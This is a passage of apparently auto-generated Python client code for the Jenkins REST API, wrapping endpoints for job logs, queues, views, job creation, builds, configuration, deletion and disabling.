raise ValueError("Missing the required parameter `name` when calling `get_job_progressive_text`") # noqa: E501
# verify the required parameter 'number' is set
if ('number' not in local_var_params or
local_var_params['number'] is None):
raise ValueError("Missing the required parameter `number` when calling `get_job_progressive_text`") # noqa: E501
# verify the required parameter 'start' is set
if ('start' not in local_var_params or
local_var_params['start'] is None):
raise ValueError("Missing the required parameter `start` when calling `get_job_progressive_text`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
if 'number' in local_var_params:
path_params['number'] = local_var_params['number'] # noqa: E501
query_params = []
if 'start' in local_var_params:
query_params.append(('start', local_var_params['start'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['jenkins_auth'] # noqa: E501
return self.api_client.call_api(
'/job/{name}/{number}/logText/progressiveText', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_queue(self, **kwargs): # noqa: E501
"""get_queue # noqa: E501
Retrieve queue details # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_queue(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: Queue
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_queue_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_queue_with_http_info(**kwargs) # noqa: E501
return data
def get_queue_with_http_info(self, **kwargs): # noqa: E501
"""get_queue # noqa: E501
Retrieve queue details # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_queue_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: Queue
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_queue" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['jenkins_auth'] # noqa: E501
return self.api_client.call_api(
'/queue/api/json', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Queue', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_queue_item(self, number, **kwargs): # noqa: E501
"""get_queue_item # noqa: E501
Retrieve queued item details # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_queue_item(number, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str number: Queue number (required)
:return: Queue
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_queue_item_with_http_info(number, **kwargs) # noqa: E501
else:
(data) = self.get_queue_item_with_http_info(number, **kwargs) # noqa: E501
return data
def get_queue_item_with_http_info(self, number, **kwargs): # noqa: E501
"""get_queue_item # noqa: E501
Retrieve queued item details # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_queue_item_with_http_info(number, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str number: Queue number (required)
:return: Queue
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['number'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_queue_item" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'number' is set
if ('number' not in local_var_params or
local_var_params['number'] is None):
raise ValueError("Missing the required parameter `number` when calling `get_queue_item`") # noqa: E501
collection_formats = {}
path_params = {}
if 'number' in local_var_params:
path_params['number'] = local_var_params['number'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['jenkins_auth'] # noqa: E501
return self.api_client.call_api(
'/queue/item/{number}/api/json', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Queue', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)

    def get_view(self, name, **kwargs):  # noqa: E501
        """get_view  # noqa: E501

        Retrieve view details  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_view(name, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str name: Name of the view (required)
        :return: ListView
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.get_view_with_http_info(name, **kwargs)  # noqa: E501
        else:
            (data) = self.get_view_with_http_info(name, **kwargs)  # noqa: E501
            return data

    def get_view_with_http_info(self, name, **kwargs):  # noqa: E501
        """get_view  # noqa: E501

        Retrieve view details  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_view_with_http_info(name, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str name: Name of the view (required)
        :return: ListView
                 If the method is called asynchronously,
                 returns the request thread.
        """
        local_var_params = locals()

        all_params = ['name']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_view" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']
        # verify the required parameter 'name' is set
        if ('name' not in local_var_params or
                local_var_params['name'] is None):
            raise ValueError("Missing the required parameter `name` when calling `get_view`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'name' in local_var_params:
            path_params['name'] = local_var_params['name']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['jenkins_auth']  # noqa: E501

        return self.api_client.call_api(
            '/view/{name}/api/json', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='ListView',  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)

    def get_view_config(self, name, **kwargs):  # noqa: E501
        """get_view_config  # noqa: E501

        Retrieve view configuration  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_view_config(name, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str name: Name of the view (required)
        :return: str
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.get_view_config_with_http_info(name, **kwargs)  # noqa: E501
        else:
            (data) = self.get_view_config_with_http_info(name, **kwargs)  # noqa: E501
            return data

    def get_view_config_with_http_info(self, name, **kwargs):  # noqa: E501
        """get_view_config  # noqa: E501

        Retrieve view configuration  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_view_config_with_http_info(name, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str name: Name of the view (required)
        :return: str
                 If the method is called asynchronously,
                 returns the request thread.
        """
        local_var_params = locals()

        all_params = ['name']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_view_config" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']
        # verify the required parameter 'name' is set
        if ('name' not in local_var_params or
                local_var_params['name'] is None):
            raise ValueError("Missing the required parameter `name` when calling `get_view_config`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'name' in local_var_params:
            path_params['name'] = local_var_params['name']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['text/xml'])  # noqa: E501

        # Authentication setting
        auth_settings = ['jenkins_auth']  # noqa: E501

        return self.api_client.call_api(
            '/view/{name}/config.xml', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='str',  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)

    def head_jenkins(self, **kwargs):  # noqa: E501
        """head_jenkins  # noqa: E501

        Retrieve Jenkins headers  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.head_jenkins(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.head_jenkins_with_http_info(**kwargs)  # noqa: E501
        else:
            (data) = self.head_jenkins_with_http_info(**kwargs)  # noqa: E501
            return data

    def head_jenkins_with_http_info(self, **kwargs):  # noqa: E501
        """head_jenkins  # noqa: E501

        Retrieve Jenkins headers  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.head_jenkins_with_http_info(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        local_var_params = locals()

        all_params = []  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method head_jenkins" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']

        collection_formats = {}

        path_params = {}

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # Authentication setting
        auth_settings = ['jenkins_auth']  # noqa: E501

        return self.api_client.call_api(
            '/api/json', 'HEAD',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type=None,  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)

    def post_create_item(self, name, **kwargs):  # noqa: E501
        """post_create_item  # noqa: E501

        Create a new job using job configuration, or copied from an existing job  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.post_create_item(name, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str name: Name of the new job (required)
        :param str _from: Existing job to copy from
        :param str mode: Set to 'copy' for copying an existing job
        :param str jenkins_crumb: CSRF protection token
        :param str content_type: Content-Type header, e.g. application/xml
        :param str body: Job configuration in config.xml format
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.post_create_item_with_http_info(name, **kwargs)  # noqa: E501
        else:
            (data) = self.post_create_item_with_http_info(name, **kwargs)  # noqa: E501
            return data

    def post_create_item_with_http_info(self, name, **kwargs):  # noqa: E501
        """post_create_item  # noqa: E501

        Create a new job using job configuration, or copied from an existing job  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.post_create_item_with_http_info(name, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str name: Name of the new job (required)
        :param str _from: Existing job to copy from
        :param str mode: Set to 'copy' for copying an existing job
        :param str jenkins_crumb: CSRF protection token
        :param str content_type: Content-Type header, e.g. application/xml
        :param str body: Job configuration in config.xml format
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        local_var_params = locals()

        all_params = ['name', '_from', 'mode', 'jenkins_crumb', 'content_type', 'body']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method post_create_item" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']
        # verify the required parameter 'name' is set
        if ('name' not in local_var_params or
                local_var_params['name'] is None):
            raise ValueError("Missing the required parameter `name` when calling `post_create_item`")  # noqa: E501

        collection_formats = {}

        path_params = {}

        query_params = []
        if 'name' in local_var_params:
            query_params.append(('name', local_var_params['name']))  # noqa: E501
        if '_from' in local_var_params:
            query_params.append(('from', local_var_params['_from']))  # noqa: E501
        if 'mode' in local_var_params:
            query_params.append(('mode', local_var_params['mode']))  # noqa: E501

        header_params = {}
        if 'jenkins_crumb' in local_var_params:
            header_params['Jenkins-Crumb'] = local_var_params['jenkins_crumb']  # noqa: E501
        if 'content_type' in local_var_params:
            header_params['Content-Type'] = local_var_params['content_type']  # noqa: E501

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in local_var_params:
            body_params = local_var_params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['*/*'])  # noqa: E501

        # HTTP header `Content-Type`: keep an explicitly supplied
        # `content_type` argument instead of overwriting it with the default
        if 'Content-Type' not in header_params:
            header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
                ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['jenkins_auth']  # noqa: E501

        return self.api_client.call_api(
            '/createItem', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type=None,  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)

    def post_create_view(self, name, **kwargs):  # noqa: E501
        """post_create_view  # noqa: E501

        Create a new view using view configuration  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.post_create_view(name, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str name: Name of the new view (required)
        :param str jenkins_crumb: CSRF protection token
        :param str content_type: Content-Type header, e.g. application/xml
        :param str body: View configuration in config.xml format
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.post_create_view_with_http_info(name, **kwargs)  # noqa: E501
        else:
            (data) = self.post_create_view_with_http_info(name, **kwargs)  # noqa: E501
            return data

    def post_create_view_with_http_info(self, name, **kwargs):  # noqa: E501
        """post_create_view  # noqa: E501

        Create a new view using view configuration  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.post_create_view_with_http_info(name, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str name: Name of the new view (required)
        :param str jenkins_crumb: CSRF protection token
        :param str content_type: Content-Type header, e.g. application/xml
        :param str body: View configuration in config.xml format
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        local_var_params = locals()

        all_params = ['name', 'jenkins_crumb', 'content_type', 'body']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method post_create_view" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']
        # verify the required parameter 'name' is set
        if ('name' not in local_var_params or
                local_var_params['name'] is None):
            raise ValueError("Missing the required parameter `name` when calling `post_create_view`")  # noqa: E501

        collection_formats = {}

        path_params = {}

        query_params = []
        if 'name' in local_var_params:
            query_params.append(('name', local_var_params['name']))  # noqa: E501

        header_params = {}
        if 'jenkins_crumb' in local_var_params:
            header_params['Jenkins-Crumb'] = local_var_params['jenkins_crumb']  # noqa: E501
        if 'content_type' in local_var_params:
            header_params['Content-Type'] = local_var_params['content_type']  # noqa: E501

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in local_var_params:
            body_params = local_var_params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['*/*'])  # noqa: E501

        # HTTP header `Content-Type`: keep an explicitly supplied
        # `content_type` argument instead of overwriting it with the default
        if 'Content-Type' not in header_params:
            header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
                ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['jenkins_auth']  # noqa: E501

        return self.api_client.call_api(
            '/createView', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type=None,  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)

    def post_job_build(self, name, json, **kwargs):  # noqa: E501
        """post_job_build  # noqa: E501

        Build a job  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.post_job_build(name, json, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str name: Name of the job (required)
        :param str json: (required)
        :param str token:
        :param str jenkins_crumb: CSRF protection token
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.post_job_build_with_http_info(name, json, **kwargs)  # noqa: E501
        else:
            (data) = self.post_job_build_with_http_info(name, json, **kwargs)  # noqa: E501
            return data

    def post_job_build_with_http_info(self, name, json, **kwargs):  # noqa: E501
        """post_job_build  # noqa: E501

        Build a job  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.post_job_build_with_http_info(name, json, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str name: Name of the job (required)
        :param str json: (required)
        :param str token:
        :param str jenkins_crumb: CSRF protection token
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        local_var_params = locals()

        all_params = ['name', 'json', 'token', 'jenkins_crumb']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method post_job_build" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']
        # verify the required parameter 'name' is set
        if ('name' not in local_var_params or
                local_var_params['name'] is None):
            raise ValueError("Missing the required parameter `name` when calling `post_job_build`")  # noqa: E501
        # verify the required parameter 'json' is set
        if ('json' not in local_var_params or
                local_var_params['json'] is None):
            raise ValueError("Missing the required parameter `json` when calling `post_job_build`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'name' in local_var_params:
            path_params['name'] = local_var_params['name']  # noqa: E501

        query_params = []
        if 'json' in local_var_params:
            query_params.append(('json', local_var_params['json']))  # noqa: E501
        if 'token' in local_var_params:
            query_params.append(('token', local_var_params['token']))  # noqa: E501

        header_params = {}
        if 'jenkins_crumb' in local_var_params:
            header_params['Jenkins-Crumb'] = local_var_params['jenkins_crumb']  # noqa: E501

        form_params = []
        local_var_files = {}

        body_params = None
        # Authentication setting
        auth_settings = ['jenkins_auth']  # noqa: E501

        return self.api_client.call_api(
            '/job/{name}/build', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type=None,  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)

    def post_job_config(self, name, body, **kwargs):  # noqa: E501
        """post_job_config  # noqa: E501

        Update job configuration  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.post_job_config(name, body, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str name: Name of the job (required)
        :param str body: Job configuration in config.xml format (required)
        :param str jenkins_crumb: CSRF protection token
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.post_job_config_with_http_info(name, body, **kwargs)  # noqa: E501
        else:
            (data) = self.post_job_config_with_http_info(name, body, **kwargs)  # noqa: E501
            return data

    def post_job_config_with_http_info(self, name, body, **kwargs):  # noqa: E501
        """post_job_config  # noqa: E501

        Update job configuration  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.post_job_config_with_http_info(name, body, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str name: Name of the job (required)
        :param str body: Job configuration in config.xml format (required)
        :param str jenkins_crumb: CSRF protection token
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        local_var_params = locals()

        all_params = ['name', 'body', 'jenkins_crumb']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method post_job_config" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']
        # verify the required parameter 'name' is set
        if ('name' not in local_var_params or
                local_var_params['name'] is None):
            raise ValueError("Missing the required parameter `name` when calling `post_job_config`")  # noqa: E501
        # verify the required parameter 'body' is set
        if ('body' not in local_var_params or
                local_var_params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `post_job_config`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'name' in local_var_params:
            path_params['name'] = local_var_params['name']  # noqa: E501

        query_params = []

        header_params = {}
        if 'jenkins_crumb' in local_var_params:
            header_params['Jenkins-Crumb'] = local_var_params['jenkins_crumb']  # noqa: E501

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in local_var_params:
            body_params = local_var_params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['*/*'])  # noqa: E501

        # HTTP header `Content-Type`: no `content_type` parameter here, so
        # only fill in the default when the header has not been set already
        if 'Content-Type' not in header_params:
            header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
                ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['jenkins_auth']  # noqa: E501

        return self.api_client.call_api(
            '/job/{name}/config.xml', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type=None,  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)

    def post_job_delete(self, name, **kwargs):  # noqa: E501
        """post_job_delete  # noqa: E501

        Delete a job  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.post_job_delete(name, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str name: Name of the job (required)
        :param str jenkins_crumb: CSRF protection token
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.post_job_delete_with_http_info(name, **kwargs)  # noqa: E501
        else:
            (data) = self.post_job_delete_with_http_info(name, **kwargs)  # noqa: E501
            return data

    def post_job_delete_with_http_info(self, name, **kwargs):  # noqa: E501
        """post_job_delete  # noqa: E501

        Delete a job  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.post_job_delete_with_http_info(name, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str name: Name of the job (required)
        :param str jenkins_crumb: CSRF protection token
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        local_var_params = locals()

        all_params = ['name', 'jenkins_crumb']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method post_job_delete" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']
        # verify the required parameter 'name' is set
        if ('name' not in local_var_params or
                local_var_params['name'] is None):
            raise ValueError("Missing the required parameter `name` when calling `post_job_delete`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'name' in local_var_params:
            path_params['name'] = local_var_params['name']  # noqa: E501

        query_params = []

        header_params = {}
        if 'jenkins_crumb' in local_var_params:
            header_params['Jenkins-Crumb'] = local_var_params['jenkins_crumb']  # noqa: E501

        form_params = []
        local_var_files = {}

        body_params = None
        # Authentication setting
        auth_settings = ['jenkins_auth']  # noqa: E501

        return self.api_client.call_api(
            '/job/{name}/doDelete', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type=None,  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)

    def post_job_disable(self, name, **kwargs):  # noqa: E501
        """post_job_disable  # noqa: E501

        Disable a job  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.post_job_disable(name, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str name: Name of the job (required)
        :param str jenkins_crumb: CSRF protection token
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.post_job_disable_with_http_info(name, **kwargs)  # noqa: E501
        else:
            (data) = self.post_job_disable_with_http_info(name, **kwargs)  # noqa: E501
            return data

    def post_job_disable_with_http_info(self, name, **kwargs):  # noqa: E501
        """post_job_disable  # noqa: E501

        Disable a job  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.post_job_disable_with_http_info(name, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str name: Name of the job (required)
        :param str jenkins_crumb: CSRF protection token
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        local_var_params = locals()

        all_params = ['name', 'jenkins_crumb']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method post_job_disable" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']
        # verify the required parameter 'name' is set
        if ('name' not in local_var_params or
                local_var_params['name'] is None):
            raise ValueError("Missing the required parameter `name` when calling `post_job_disable`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'name' in local_var_params:
            path_params['name'] = local_var_params['name']  # noqa: E501

        query_params = []

        header_params = {}
        if 'jenkins_crumb' in local_var_params:
            header_params['Jenkins-Crumb'] = local_var_params['jenkins_crumb']  # noqa: E501

        form_params = []
        local_var_files = {}

        body_params = None
        # Authentication setting
        auth_settings = ['jenkins_auth']  # noqa: E501

        return self.api_client.call_api(
            '/job/{name}/disable', 'POST',
            path_params,
